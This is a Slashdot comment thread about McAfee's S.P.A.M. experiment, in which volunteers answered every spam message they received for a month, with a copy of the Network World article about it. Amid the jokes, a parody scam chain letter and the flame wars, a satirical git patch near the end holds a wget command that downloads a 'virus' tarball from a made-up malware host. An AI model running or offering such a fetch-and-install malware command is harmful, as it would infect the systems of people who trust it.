Slashdot Mirror
What Happens When You Reply To ALL of Your Spam
bednarz writes "For Tracy Mooney, a married mother of three in Naperville, Ill., the decision to abandon cyber-sense and invite e-mail spam into her life for a month by participating in a McAfee experiment was a bit of a lark. The idea of the Spammed Persistently All Month (S.P.A.M.) experiment — which fittingly started on April Fool's Day — was to have 50 volunteers from around the world answer every spam message and pop-up ad they got. Mooney was game, especially since McAfee was giving a free PC to all participants. She told her story to Network World."
The Nigerian prince send her millions.
She got 1000 Valium for $4.
Her lover was more satisfied.
And she won an iPod.
And lived happily ever after. =)
He's getting rather old, but he's a good mouse.
I find the idea of doing this to receive a free PC a fantastic irony, don't you?
These posts express my own personal views, not those of my employer
Since the point of the experiment wasn't to test the operating system, why give the test subjects the operating system currently most affected by malaware? Why not a Mac or presetup Linux box?
"Thanks for all the money you paid to us. We've used it to buy off ISO among other things" -Microsoft
I tried to sign up for jobs that would generate an at-home income with what seemed like respectable sites, however these sites led to massive amounts of spam.
Idiot.
McAfee Spam Experiment
As much as it would be good if she did indeed win the free iPod and get her hands on all that va_l1um, most spam that gets stored on my spam folder looks to be pretty old. I got a circular/spam message from the depths of hell the other day telling me to keep an eye out for some astral phenomenon or other. A Google search revealed that said event occurred in about 2006.
Zombie relays sending out the same shite day after day. Most spam is totally useless. A bit like the Sky TV schedulers.
Smokey, this is not 'Nam, this is bowling. There are rules.
myself when I was new on the internet. I didn't know at first that the unsubscribe on the bottom of the email was just a way to verify that it was a live address, so I got lots.
What I decided was that the companies that were paying for the spam must like it, so I would click on the link in the spam, find their customer service email and copy it. Then I went to google and entered "subscribe enter email". After that I spent quite a lot of hours signing these companies up for all kinds of email. I hope they liked it. When I had to put in a name I entered Spam War.
Look where all this talking got us, baby.
"Mooney says, noting that the sudden upsurge in junk mail left the neighborhood postman somewhat aghast. "It grew exponentially, so I stopped giving out my home address," she says, adding, "I am concerned about the environment.""
It's all well and good that she had an alias and a free pc to be subject to this open invitation for harassment, but to actually really give out your home address to these spammers is a bit reckless. She will, at a minimum, be regretting this for years since the "current resident" will be getting spam even if she directs the post office not to deliver mail to her alias.
) Human Kind Vs Human Creation
) It'd be interesting to see how many humans would survive to serve us.
Not only did I find it ironic that an article about spam would be interrupted by an obnoxious pop-up that blackened the article in the background until clicking out of it, but I won't participate in your "survey" designed to send me more spam, and I won't be visiting your site anymore. kthnx
Considering all the spyware and such that was installed ... wouldn't an anti-virus company be interested in it?
So, you get a "free" computer in exchange for replying to *every* spam email that you get each day?
They said the average US participant got 70 per day. Say an average of 30 seconds to a minute to reply to each? (Some asked to fill out forms, apply for job postings etc. so those should fall well over the one minute mark.)
I think you could easily hit an hour or more per day just replying to spam emails, for 365 days a year!
That's about 9 weeks of full time work, all for a computer that is going to be seriously f'd up with malware and spyware and really shouldn't be used for anything personal until the year is up and it's been reformatted.
So you get a year old computer after spending 9 weeks of your time answering lame spam messages.
Guess everyone has a different definition of "free".
(By comparison, if you spend 2 weeks working for $6 an hour you'd have almost $500 and could probably buy a computer as good as what you were given. If you worked the same 9 weeks you'd take home over $2k. )
Reminds of this great poem from years ago:
http://www.satirewire.com/features/poetry_spam/01free_winner.shtml
I Answered All My Spam
I never know what I might find,
on any day I go online.
I used to get in quite a huff,
while wading through unwanted stuff.
But then I changed the man I am,
the day I answered all my spam.
Now every time I check my box,
I load up on fantastic stocks.
I'll gladly say I felt no loss,
when, with a smile, I fired my boss.
With just one click, the best thing yet,
I freed myself of all my debt.
I have, paying a few small fees,
ten university degrees.
Now that I'm losing all this weight,
I'm sure, someday, I'll get a date.
Instead of going to a show,
I spy on everyone I know.
(That's easy, since I have in hand,
this nifty wireless video cam.)
I spend my evenings viewing screens,
of barely legal horny teens.
And with a little credit charge,
Whoopee! My penis was enlarged!
Meanwhile these shots of Britney Spears
should be enough to last for years.
And so I lead this online life,
my monitor is now my wife.
It has become my greatest dream,
to launch my own get-rich-quick scheme.
And if you think you might get missed,
relax, you're on my e-mail list.
I read Usenet for the articles.
Too bad it won't let me read page two of the article because it first starts by trying to ask me to complete a survey about their site then starts redirecting me elsewhere. I think that qualifies as irony.
Sentences like this sort of nails it: "It's all snake oil. I'm amazed at what true junk is out there when you're clicking through on e-mail."
It tells a sad tale about the people these spam messages are targeted at. You really don't have to be computer literate to figure out that all this is pure crap. Judging by the dumploads of messages that hits my spam filter every day there must be too many fools with computers and internet access waiting to be parted from their money. Some times I wonder if I should start spamming, we really don't have harsh sentences in Norway...
On a slightly offtopic note, she looks kinda M.I.L.F.!
Dvorak on Doomtech
... would the address of your local waste recycling center.
Electronic spam is bad because the sender pays almost nothing (just bounces it through zombies).
But if the spammer is paying for PAPER to be delivered ... send more! Drive up their costs and drive them out of business.
I can just see it coming ...
To all of my friends, I do not usually forward messages, But this is from my good friend Pearlas Sandborn and she really is an attorney.
If she says that this will work - It will work. After all, What have you got to lose? SORRY EVERYBODY.. JUST HAD TO TAKE THE CHANCE!!! I'm an attorney, And I know the law. This thing is for real. Rest assured McAfee will follow through with their promises for this S.P.A.M. test mail.
Dear Friends; Please do not take this for a junk letter. If you ignore this, You will repent later. McAfee is now the largest anti-virus software company and in an effort to make sure that their product remains the most widely used program, they are running an e-mail beta test.
When you forward this e-mail to friends, McAfee can and will track it ( If you are a Microsoft Windows user) For a two weeks time period.
For every person that you forward this e-mail to, McAfee will pay you $245.00 For every person that you sent it to that forwards it on, McAfee will pay you $243.00 and for every third person that receives it, You will be paid $241.00. Within two weeks, McAfee will contact you for your address and then send you a check.
I thought this was a scam myself, But two weeks after receiving this e-mail and forwarding it on. McAfee contacted me for my address and within days, I receive a check for $2,500.00. You need to respond before the beta testing is over.
Help a man when he is in trouble and he will remember you when he is in trouble again.
I think her reaction to her spam is classic: "I was horrified," says Mooney, a realtor by profession. "It's all snake oil. I'm amazed at what true junk is out there when you're clicking through on e-mail."
Spammers love people like her--people so insulated by American corporate media that they think the internet is just another shopping mall. And what could possibly go wrong in a mall? God bless her.
My first reaction to the story was, "Good PR stunt...otherwise pointless"...until I RTFA and found this quote from the Naperville soccer mom regarding what she found in her in-box:
Apparently people are less informed about spam than I thought, and this little one month 'contest' really is raising awareness and educating people...
Thank you Dave Raggett
Anyone have networkworld.com crash FF3 repeatedly? I couldn't even get through the first page =/
I wonder, if they ever compared the speed of a clean install of Windows with an anti-virus to a malware messed up install of Windows and see how fast they were. In most cases I find that the anti-virus computer is slower then the one with a ton of viruses!!! And this being McAfee, I don't think that they would worry about slowdowns much (can't read TFA it doesn't want to load or is Slashdotted) because it seems that any computer with McAfee/Norton/any other commercial AV, is slow, really slow. Even on XP with newer hardware it still is slow.
Taxation is legalized theft, no more, no less.
[Article Text]
For Tracy Mooney, a married mother of three in Naperville, Ill., the decision to abandon cyber-sense and invite e-mail spam into her life for a month by participating in a McAfee experiment was a bit of a lark.
The idea of the Spammed Persistently All Month (S.P.A.M.) experiment which fittingly started on April Fool's Day was to have 50 volunteers from around the world answer every spam message and pop-up ad on their PC.
What would be the experience in 10 countries when everyday people, armed with a PC and e-mail account McAfee provided for the Global S.P.A.M. Diaries project, clicked through the spam and chronicled the results?
Mooney who had observed the family's PC crippled just before Christmas by a virus was game, especially because McAfee was giving a free PC to all participants. She was selected to be among the 50 volunteers picked by McAfee out of 2,000 people who applied to be part of the adventure.
By the time it was all over, after every bank-account phishing scam, Nigerian bank scheme, and offer for medication, adult content and just plain free stuff had been pursued. "I was horrified," says Mooney, a realtor by profession. "It's all snake oil. I'm amazed at what true junk is out there when you're clicking through on e-mail."
McAfee is releasing the results Tuesday of its free-wheeling month-long S.P.A.M. experiment, done largely to illustrate if you didn't know already how spam is connected to malware and criminal activity, not to mention some of the slimiest marketing ever devised.
Each S.P.A.M. volunteer saw an average of 70 spam messages arrive in their in-box each day, with men receiving about 15 more per day than women. That was a lot to answer, but "Penelope Retch" the alias that Mooney chose for her S.P.A.M. adventure answered every single message.
In her guise as Penelope Retch, Mooney answered the e-mail that came into her account. "I'd see an interactive spam, open it, click on it and asked to be removed. That would only make it worse," she says. "They'd say 'no.'"
Whether trying to win an iPod online, get free travel brochures, weight-loss tea or Maybelline eyeliner, the effect of entering a home address was extreme. Immediately, a deluge of mail landed at her doorstep, directed to the attention of Penelope Retch.
"One of the mail offers I got was a $7,500 credit card for Penelope Retch," Mooney says, noting that the sudden upsurge in junk mail left the neighborhood postman somewhat aghast. "It grew exponentially, so I stopped giving out my home address," she says, adding, "I am concerned about the environment."
Mooney clicked through on the phishing e-mails for fake Wells Fargo and other bank sites, sat back as the supposed government of Nigeria sought to give her an inheritance, and watched a foreign IP address go after a dummy PayPal account that had been set up as part of the S.P.A.M. experiment.
Overall, the most obvious result of the S.P.A.M. experiment was that the PC that McAfee had provided for the project noticeably slowed down, clogged up with spyware, Mooney says.
According to McAfee, which selected five participants from each of 10 countries for the S.P.A.M. experiment, the five U.S. participants received the most spam: 23,233 messages over the course of the month.
Brazil and Italy were in the 15,000-plus category, and Mexico and United Kingdom above 10,000. Australia, The Netherlands and Spain were in the 5,000 to 9,000-plus spam range. The S.P.A.M. volunteers in France and Germany got the least, less than 3,000 for the month. McAfee didn't even include what it calls "grey mail" (e-mail that arrived after participants signed up for a newsletter, for example) in this count.
Phishing e-mail accounted for 22% of the spam received by the Italian volunteers and 18% of the U.S. ones. In general, spam appears to still largely be delivered in English; French- and German-language spam were the only non-English spam to amo
Politics is Treachery, Religion is Brainwashing
There are lots of ways to interpret this, including that English speakers are idiots, but whatever else the spammers aren't being politically correct. They're using English because that is the way to reach people, and for the most part it doesn't pay to translate the same message into another language, even though that can't be very expensive.
Judging by the dumploads of messages that hits my spam filter every day there must be too many fools with computers and internet access waiting to be parted from their money.
Yeah, the spammers. You see, the folks making the money now are the folks selling the software and computers to spammers. So,it's really folks who think they can make easy money spamming.
I actually talked to a little old lady. She asked me why she was still getting these messages stating that she won a drawing based on a random selection of her email after deleting it from her inbox. She thought there was something wrong with her email client. I told her what was up. Long story short, she knew it was a scam. So, maybe one in a billion believes that shit.
I think many/most of us groan at the very thought of more junky emails in the inbox.
If each mistake being made is a new one, then progress is being made.
The "From" and "Reply To" fields of spam are invariably fake, or spoofed. If two people use a program like BoxTrap, and one of them gets a spam using the other's email address, they'll either automatically white list each other, or create an endless challenge response loop.
I wrote a program which replies to all suspected spam (modified challenge-response), and the only thing that happened was I got my webhost black listed and they temporarily suspended the account. I dropped it to 2 accounts, and reset the chron job to run every 5 minutes instead of every 1 minute, and there hasn't been a problem since.
Though looking at the spam trap, I am still getting a good 400 spams a day. The only way I've found to reduce it is to send a bounce *and* a challenge response. Spammers will knock off bounces, but real people will ignore them if there's also a challenge response. But I haven't taken the time to figure out how to do that with PHP on a reseller account yet.
It sounds like you send an enormous amount of backscatter, and are probably doing much more harm than good. It would be much better to simply drop the connection at SMTP time, rather than accepting and then generating a bounce. Or do like I do, and hold their connection open for a long time before actually dropping it.
hehehehe
A bit, perhaps, but I view it as a practicality: They thoughtfully provide her with a replacement for what used to be her computer, but now is a smoking, virus- and trojan-infected hole in her desk..
For instance, the experiment would have been potentially useful if Penelope Retch had a few honeypot credit cards and bank accounts to give out to spammers and phishing websites.
Also of interest (at least to /.ers), the address I formerly used in my usenet sig still gets a TON of pornographic spam, promising some rather graphic scenery... and apparently I'm not all that uncommon. Did any of her volunteers reply to the pr0n spam? Did they get a deluge of pornographic material on their doorsteps?
I can see the fnords!
I'll bet they didn't go to the site of TFA. Talk about pop-ups! :-/
Firefox
Noscript
Peter predicted that you would "deliberately forget" creation 2000 years ago...
I love to do that, too! I've noticed, though, that nowadays a lot of companies have individually printed business reply mail that contains a serial number that probably maps to my name and address (how did they know that my parents, Mr. & Mrs. Resident, named me Current?). If I send it back, they'll know exactly who did it. Technically, that should tell them to stop sending to me since they're just wasting their time, but it proves that I'm reading their ads (rather than just dumping the junk mail), and I would much rather they get the feedback that "the generic recipient" is pissed off at their mass mailing, rather than any one particular person.
(On a side note: yes, I did try once specifically respond to a charity organization to take me off their list. I said that I would no longer contribute (I had contributed once) and could they please save my sanity --as well as their costs-- by taking me off the list. I kept getting more and more physical junk mail, almost as if they were being encouraged by my entreaties to stop. I threatened to diss them for wasting their income from donations, and I am making good on that threat with this post.)
404555974007725459910684486621289147856453481154 in hex is "You sank my Battleship?"
[GPG key in journal]
Well, I dunno. It sounds like she did figure out that it was junk. Otherwise it would be more like, "OMG, now the Nigerian prince's inheritance will be sent to McAffee's non-existent alias!" ;) Plus, it doesn't say that she answered to any spam before McAffee paid her to. So she must have already figured out there's something fishy about it.
Way I read it, it's just the difference between having figured something out, and actually seeing it. So to speak, the same difference as between figuring out that the goatse.cx link all over the place must be some kind of trick or scam, and actually seeing it.
Basically, she's had to wade through the proverbial shit-clogged stables of Augeas. Or the Internet version thereof. Most people seem to assume each other nice, so the sheer amount of nastiness must have been amazing. Even if you know it's there, it's one thing to just know it as an abstract notion and wade through it for an hour or two a day.
So she says she's amazed. Well, blimey, I'd probably be amazed too.
There's really nothing there that says "OMG, corporate-brainwashed idiot" in that confession of amazement.
A polar bear is a cartesian bear after a coordinate transform.
The false conclusion we're supposed to draw from this is that user actions do not make a difference?
It doesn't matter how much you hate Microsoft twitter, the reality is that the vast majority of malware/trojan infections on Windows PCs are the result of user action, or the lack thereof. Why do you think UAC is so annoying in Vista? Because Microsoft developers had nothing better to do?
At some point the user has to be responsible for their actions, unless you don't want to let them do anything with their computers. The bad old days when Microsoft software put convenience over security are long gone, so you might want to find a different way to make your case against Windows. The "it's impossible to use securely" argument is getting really tiresome, especially coming from people like you.
Web2.0: I love when people Flickr my cuil and digg my boingboing until my google is reddit and I start to yahoo
How appropriate, when I clicked on the link to TFA, the first thing I see is a pop-up ad.
The irony of getting spammed while trying to read an article about spam...
With all its resources and all its pretense to being anti-spam, has McAffee ever once tried to field a product or service that would trace spam back to its source and try to get it halted?
Of course not. They're in the business of hauling away the junk you receive. Stopping it from getting to you would lower their revenues.
Please don't intentionally add to the spam backscatter.
I only have page 1 of the original text. Someone else will have to provide page 2.
For Tracy Mooney (pictured), a married mother of three in Naperville, Ill., the decision to abandon cyber-sense and invite e-mail spam into her life for a month by participating in a McAfee experiment was a bit of a lark.
The idea of the Spammed Persistently All Month (S.P.A.M.) experiment -- which fittingly started on April Fool's Day -- was to have 50 volunteers from around the world answer every spam message and pop-up ad on their PC.
What would be the experience in 10 countries when everyday people, armed with a PC and e-mail account McAfee provided for the Global S.P.A.M. Diaries project, clicked through the spam and chronicled the results?
Mooney -- who had observed the family's PC crippled just before Christmas by a virus -- was game, especially because McAfee was giving a free PC to all participants. She was selected to be among the 50 volunteers picked by McAfee out of 2,000 people who applied to be part of the adventure.
By the time it was all over, after every bank-account phishing scam, Nigerian bank scheme, and offer for medication, adult content and just plain free stuff had been pursued. "I was horrified," says Mooney, a realtor by profession. "It's all snake oil. I'm amazed at what true junk is out there when you're clicking through on e-mail."
McAfee is releasing the results Tuesday of its free-wheeling month-long S.P.A.M. experiment, done largely to illustrate -- if you didn't know already -- how spam is connected to malware and criminal activity, not to mention some of the slimiest marketing ever devised. (Compare antispam products.)
Each S.P.A.M. volunteer saw an average of 70 spam messages arrive in their in-box each day, with men receiving about 15 more per day than women. That was a lot to answer, but "Penelope Retch" -- the alias that Mooney chose for her S.P.A.M. adventure -- answered every single message.
The spammed life of Penelope Retch
In her guise as Penelope Retch, Mooney answered the e-mail that came into her account. "I'd see an interactive spam, open it, click on it and asked to be removed. That would only make it worse," she says. "They'd say 'no.'"
Whether trying to win an iPod online, get free travel brochures, weight-loss tea or Maybelline eyeliner, the effect of entering a home address was extreme. Immediately, a deluge of mail landed at her doorstep, directed to the attention of Penelope Retch.
From the article, "...men receiving about 15 more per day than women."
And Randy changes his email profile to female.
I mean, "And Randi changes her email profile to female."
-Randi
OK.... so what happened ?
All I got from TFA was that she got spammed, and if you dont use McAfee products, you too will end up with 10,000 spam messages a month and your PC will "slow down".
TFA was a puff piece with absolutely no detail to speak of.
Title should have read - "Spammed for a month for a free PC"
Yeah, my web host actually sold on the admin email I gave them to spammers. Thing is it was a unique address traceable to them. Wonder how much they were paid and by whom. They're quite a big outfit too.
Can't name them as still migrating one account away.
That's about 50,000 messages shy of what I get every month without replying to spam. Just use the same address on the net for 15 years and you too can bask in the faux adoration that two thousand five hundred spam messages a day can bring.
What I find ironic is that on the second page of this story about responding to spam and pop-ups, I got... wait for it... a pop-up.
Anyone else find it amusing that a page on the domain "networkworld" is slashdotted? Perhaps they should focus more on "networktown" or "networkhouse".
In order to win some new RAM
Tracy replied to all of her spam
Her account now abounds
in Nigerian Pounds
And her cock is the size of Wuhan.
Well, considering how infected the old PC must be (from opening, clicking on, and responding to all that spam), and the effort (short of wipe and restore) to fix it, I guess they are kinda due new PCs...
StarTrekPhase2 - The Five Year Mission Continues!
The Prime Minister of Luxemberg gives you notice by his royal Appointment that you have been granted a lifetime supply of the Americanned delight. When finished with the spam, please ring the bell twice for the kitchen or once for the Federal Reserve despository.
Murphy's Laws of Combat law number nine:
Never Draw Enemy Fire, It Irritates Your Team Mates
This is definitely drawing enemy fire, however your team mates are a bunch of dummies. It is interesting no matter what type environment you are in, drawing enemy fire is a stupid thing to do... unless you are in a test environment where everything is sacrificial.
I had one person here, out of curiosity, reply to one spam message and my mail server got an ton of spam in response to that. I discover responding to spam is like starting a chain reaction in a nuclear device and my guess when you reply to on spam message that it goes to evil botnet network that shares your email address to all of them and they in turn send spam/malware/junk back to you.
Death to spam and extreme pain to the people who create it. Dying is too good for those people.
Note how the url for the "print" version of the page includes the full file system path location of the html. http://www.networkworld.com/cgi-bin/mailto/x.cgi?pagetosend=/export/home/httpd/htdocs/news/2008/070108-mcafee-spam-experiment.html&pagename=/news/2008/070108-mcafee-spam-experiment.html&pageurl=http://www.networkworld.com/news/2008/070108-mcafee-spam-experiment.html&site=security This, on the Network World SECURITY page.
"Overall, the most obvious result of the S.P.A.M. experiment was that the PC that McAfee had provided for the project noticeably slowed down, clogged up with spyware, Mooney says."
I dunno about you, but this is something I would rather NOT have published as a security company...
Do you go around replying to ALL of twitters posts ?
I dub thee: "Bizarro Twitter"
[dun-dun-dun!]
-Billco, Fnarg.com
McAfee provided her with a computer for the project.
Fool me once, shame on you. Fool me twice, watch it -- I'm huge!
Five people per country is not a very large sample.
Incidentally, I get small but regular amount of spam in Russian, Spanish and Chinese.
Taking stuff apart since 1969 (TM)
I get more than 5000 spam messages a day. They'd have to give me a lot more than a new PC.
the five U.S. participants received the most spam: 23,233 messages over the course of the month.
I have one of the older private domains on the Internet, and for many years it was running a BBS gatewayed to Usenet, and then providing shell accounts. All the email addresses and Usenet Message IDs sat there like a ticking bomb until spammers started harvesting them. At one point I was getting so much spam I had to block China, Brazil, Argentina, and several ISPs in countries like Spain and Italy because the amount of spam I was getting was putting me over my colo's traffic cap to the tune of $750 a month.
Looking at my current logs, yesterday, 17197 delivery attempts were blocked by RBL, 24561 attempts by greylisting, and almost 2000 were blocked by content filtering after receipt. And the only users on this box are myself and my family, who got a total of 81 legitimate messages actually delivered.
That's more messages in one day than they're getting in one month.
I wish it was only as bad as it was in 1997.
No. Did you have any other questions?
Web2.0: I love when people Flickr my cuil and digg my boingboing until my google is reddit and I start to yahoo
at least she was worried about the enviroment when she stopped putting her physical address in to stop getting snail spam...
where do they find these people? is that the average American thinker?
One time my wife got so sick of spam that she clicked the unsubscribe link on all the spams she received. Of course, this only told the spamming sites that there was someone on the other end... Now she gets a ton more a day. And she's crazy about deleting it, even when it's in her spam folder. I currently have like 7000 spams in my gmail spam folder and it ticks her off so much to see a number that large.
Reviewing just the first hour of video games.
I love sending a little surprise to the credit card solicitations, I hear most of them are completely automated ... I can't imagine peanut butter is good for scanners ... to C[my]A, I always print a warning on the outside of the envelope warning them there is peanut butter inside, but if it is 100% automated ... I'm too lazy to Google it for you but years ago someone proved you can take together an application torn into little piece & then fill out & mail & get it accepted ... inexcusable & since then I send a treat.
"If you have nothing to hide, you have nothing to fear." - Every fascist, ever
I'm surprised she only ended up with 23,000 spam at the end of the month, when purposely giving out her address. Ever since getting Gmail in 2004, I have been completely careless about giving out my address, but never gave it to spammers on purpose. I now have 7,742 messages in my Spam folder, which deletes messages after 30 days, so that's what I get in a month. I only see 1 or 2 of those 7k each month :-)
WHO NEEDS SHIFT WHEN YOU HAVE CAPSLOCK/ DAMN1
I'm confused. You start off telling us that you understand that return addresses on spam are fake.
From the rest of your comment, however, it seems you are still using them to send out messages. Please tell me I'm misreading.
Backscatter is a big problem; if you are really doing what it sounds like you are doing, mail server operators and domain owners everywhere hate you.
4096R/EF7BAFA6 79E1 DF98 D09D 898F 9A11 F6F0 DDDC 23FA EF7B AFA6
I'd legalize spamming. BUT, I would have extremely harsh penalties for buying something off a SPAM message.
How did you get Firefox to do that?
"I've got more toys than Teruhisa Kitahara."
I've said it before.
Opt out of direct mail and credit offers if you don't want them. It is easy, and while no longer entirely free, is very cheap ($1).
Sign up for the Direct Marketing Association's (DMA), "Mail Preference Service" (MPS), it will reduce the amount of unwanted mail coming to you, including credit card offers, and it really works.
However, a few notes on the service:
1) It can easily take 6 months for a mailing list to be updated removing your address from it. This has to do with the frequency that marketers update and certify their lists for the USPS.
2) Some of those catalogs that you have been getting for no apparent reason that you like getting, they may stop. If you are an existing customer of a company, or have specifically requested to get a certain mailing, then you may still get that mailing.
3) If there are multiple last names in your household, you may need to submit the form multiple times with those combinations (there are some stupid list maintainers out there).
Here is why it works. The mailer doesn't want to waste money on postage and printing costs to send a mail piece to you, if all you are going to do is throw it away. There are enough people out there that are on this list, and it adds up to some serious savings quickly. Also, there may be some shifty advertisers out there, but by in large they take their mailings to reputable commercial mail houses to prepare the mail. These mail houses will often do the right thing.
Final thought: if you like paying money to keep your mailbox clean of this sort of thing, there are now services such as GreenDimes who will do this for you more proactively.
-mls
Whay aren't the feds doing this then prosecuting the people who send the snail-mail for spamming?
No sig today...
Brothers, the good lord said 'Let there be Light'
And there was light.
And then the good lord said 'Let there be water'
And there was a blue screen of death.
Can I hear an Amen Brother!
This is not the funny you're looking for.
Buy a wood stove, then get on every mailing list you can, and your fuel will be delivered to your mailbox daily by the postman for free. Of course, your spam won't be carbon neutral, but you can have the joy of heating your house at the expense of all those slime balls, and your oil bill will go down. I sense a business opportunity here.
this is what you probably look like in your tireless crusade against "M$"
this is what I always think about when I read your posts.
this is how I feel after reading your posts.
A free PC that you've gotten spammed for a month and is now full of viruses.
Hahaha!
But I disagree. I think this is what twitter looks like when he gets ready in the mornings to do battle with the evil Microsoft.
Giving a real, existing address to the scum of the earth can't be good for your health. Why didn't they set her up a PO Box or something?
With rising fuel oil costs, this may be the answer. Free fuel delivered to your door for your fireplace.
I wonder how long it will take spammers to catch on. It could be nice while it lasts.
The truth shall set you free!
and I get all the spam I need just reading the comments.
Quote fro the article: "the British volunteers received the most Nigerian scam e-mail" Maybe this is telling us something about Britain.
http://ebgp.net/ccc/
I have absolutely no spam problems:
"Two years from now, spam will be solved,"
BILL GATES, 2004
http://www.cbsnews.com/stories/2004/01/24/tech/main595595.shtml
Decent people have plenty of other accounts to tell the truth with.
Don't mind me, just fixing that for you.
Format C?
Here be signatures
Bravo!
[Intentionally left blank]
Free fuel delivered to your door for your fireplace.
TinLC
That's all I got to say, no comment, move along, nothing to see here.
Presumably this "free PC" came preinstalled with McAffee products?
Now that they have proven their own products are ineffective what products actually work?
Personally I am nearly spam free even with my spam filters off while job hunting. With my spam filters on I see maybe one spam a month. I have used Thunderbird for E-Mail and Firefox of web browsing and my spam/malware levels did not change last year when I abandoned Windows for LinuxMint.
"Overall, the most obvious result of the S.P.A.M. experiment was that the PC that McAfee had provided for the project noticeably slowed down, clogged up with spyware, Mooney says."
It wasn't the PC that slowed down but the operating system. It would have been interesting to conduct that experiment with people using several differen operating systems and then look at the amount of damage and spyware found.
[A pop-up?] Wow, that's retro. How did you get Firefox to do that?
Easy. A site can show a pop-up when the user clicks a link. Firefox detects it as a user-initiated pop-up and doesn't block it.
Strange it didn't work for me. Is my firefox broken?
Especially 9v.
1) you don't have to worry about recycling them
2) excess postage has to be paid
but now is a smoking, virus- and trojan-infected hole in her desk..
sounds like one of my exgirlfriends...
All good things...
From the spammer's point of view, yes it is.
Censorship is telling a man he can't have a steak just because a baby can't chew it. --Mark Twain
My wife at one point tried entering contests that needed email addresses. I had a domain name, so set it up to deliver mail to *@" so
we could coin email addresses ad nauseam.
Spam slowly grew, but kept on growing as long as
this was in effect. By the time I limited it to the actual 5 or so addresses we use, we were getting
over 40,000 spam emails per day. (There may have been more, but we were using dialup at that time, and the mailbox may have overfilled and throttled much of it.) It was obvious that some spammers were sending mail to every name in a long address book@.
She no longer does these contests.
If you'd actually read the post, rather than seeing 'twitter' - FOAM, LATHER, PSYCHOSIS - you'd have seen that he said user actions make no difference against spam. Not viruses/malware/trojans.
From twitter's post:
"The false conclusion we are supposed to draw is that you can somehow be spam free if only you do this or that...."
Yes, he referred to antivirus software, but the only connection I saw was that antivirus vendors often include antispam features in their full Internet security products. Of course, this wasn't mentioned, but it's a safe assumption that most people on this board know that pretty much every antivirus vendor also makes an antispam product. And since this study was to do with spam, after all, it seems safe to not specifically mention the antispam product in the comments.
You, however, would rather go off on a foaming at the mouth, psychotic tirade as soon as you grep twitter anywhere close to a comment.
Thrown any chairs lately?
"I'm going to ****ing kill twitter!!!"
"City hall" in German is "Rathaus" Kinda explains a few things......
Blocking Unwanted Parasites with a Hosts File
Works very well on this 3ghz Win2k machine, had to remove it from my Asus Eee with XP because when starting the browser up it would pause for a couple of minutes whilst it digested the massive hosts file, so now I manually enter in unwanted advertisment URLs (from sites I regularly visit like slashdot/TheRegister etc.) into the Eee's hosts file and that works nicely as I very rarely see pop-ups and the browser window on the 7" screen has more signal (article) to noise (spam) ratio.
To do something right, you often have to roll up your sleeves and get busy.
email leads to spam spam leads to malware malware leads to viruses viruses leads to suffering... The internet leads to the darkside, young padawan.
"printer" and "goatse"
TinLC
For those not understandng this,
http://www.catb.org/jargon/html/T/TINLC.html
http://www.catb.org/jargon/html/L/Lumber-Cartel.html
Dude, that's harsh.
1) While we joke about it, Nigerian scheme has a real life consequence and there are several people who has been kidnapped, threatened with a real gun, found themselves in a plot which a countries government involved. There is nothing technical about it, there are no MCafee products to stop a guy showing up your door with a real gun as they got your home address.
2) Worms/Viruses are all mafia type things run by real criminals who also has support from their governments and police. There is also terror network worm possibility. Your unprotected PC can be hosting the Al Queda sites for that month or some big pedophile network.
Will MCafee give these people some legal protection? Did they instruct these people well? Did they tell about the funny looking Nigerian mails background and what kind of people runs those schemes?
I think it would be more interesting to do it with identical hardware PCs, one running Windows, one running Linux. Do some benchmarking before starting, use the same tools on both (firefox/thunderbird maybe). Could be interesting.
My beliefs do not require that you agree with them.
There, there, Mr. Guiliani. It's time for your medicines now.
What you missed from his post before you went off on your "OMG poor little twitter" rant is the fact that he is confusing (deliberately) spam with viruses and malware, which is why I replied to him in kind. Read it again. From the petulant subject to the website he linked to (one of his favorites) to his lame-ass conclusion and creative spelling.
And when you're done, do me a favor and mark me as "foe" so you never feel personally insulted again by people who like to unravel twitter's never-ending bullshit, and I don't ever have to listen to your stupidity again.
Web2.0: I love when people Flickr my cuil and digg my boingboing until my google is reddit and I start to yahoo
But why??? To show how much of an idiot people are to accept Viagra knock offs promising to give her 'immense pleasur[sic]' and discovering that her mailbox is full of snake oil and will need more of McAffee to protect them even when they will slow your computer down more than a virus would and your email client could do better???? ...Yep, just answered my own question.:)
The shocker is that someone would be as much of a fool to give her home address away, and McAffee does not step in. I wonder if she even realizes that \/14GERAH pIll5 FR33 is a scam ;).
I actually tried one of those "Get a free Ipod" sites a while back (using a spam account, fake addresses, not giving out any of my real info) and I actually did get a free ipod, I took about 3 days an hour a day of filling out forms and ads to meet the requirements. Clearly the site was a scam assumming 99% or more of the people that try will never meet the requirements to get the prize, but you really can get the prize if you try. On a sadder note, not long after getting my free ipod I accidentally left it in some pants that went through a wash and it was ruined... bummer, atleast it was free.
Karma: Terrible.
Reason: Psychosis.
Prospect: Likely to stay that way for a long, long time.
Have any nerds deliberately setup honeypots with this in mind?
Reply to every phisher, spam bot, and storm net. The signal to noise ratio would go up taking up all remaining bandwidth. The profit margins for spammers would go down if legit sales decrease due to fake orders entered by bots purchasing Viagra with fake credit card numbers. If 99.99999% of all messages received by the Russian pharm sales people are bogus. They wouldn't pay unsuccessful spammers.
It's not the same cartoon, but Spamusement ran for about two years taking spam subjects and illustrating them in ways that, in all probability, were not what the spammer intended to get across.
The official comic hasn't been updated in almost 2 years, but the archive is still up, and last I looked the forums had turned into a community of people doing unofficial strips.
Yes, I agree ... and that action is ... [wait for it] ... they hit the Power button when there was a network cable connected to the router.
It's called security theater. You might want to Google it.
No. Actually the original argument still works fine, and is valid. Witness the Security Theater that is UAC. For some strange reason my Linux system is far more secure than any system running Vista, XP, Win9x or any other M$ OS, and yet it accomplishes this security without ever throwing a pop-up asking me if it was really me trying to accomplish a task I initiated. Hmmm ....
Guns don't kill people; Physics kills people! - John Lithgow as Dick Solomon on Third Rock From The Sun
From d11d4ebe937b27ced23b0e6f766a813c74a39907 Mon Sep 17 00:00:00 2001
./configure
From: Zero Kelvin
Date: Wed, 2 Jul 2008 20:09:50 -0400
Subject: [PATCH] Fixed ConceptJunkies misconception
---pwn3d-install | 11 +++++++----
1 files changed, 7 insertions(+), 4 deletions(-)
diff --git a/pwn3d-install b/pwn3d-install
index 7ca9506..3c1ffbc 100644 --- a/pwn3d-install
+++ b/pwn3d-install
@@ -1,6 +1,9 @@
#!/bin/bash
-wget http://malware.makemoneyfast.ru/windows/virus/pwn3d.tar.gz -untar xvfz pwn3d
-cd pwn3d
+wget
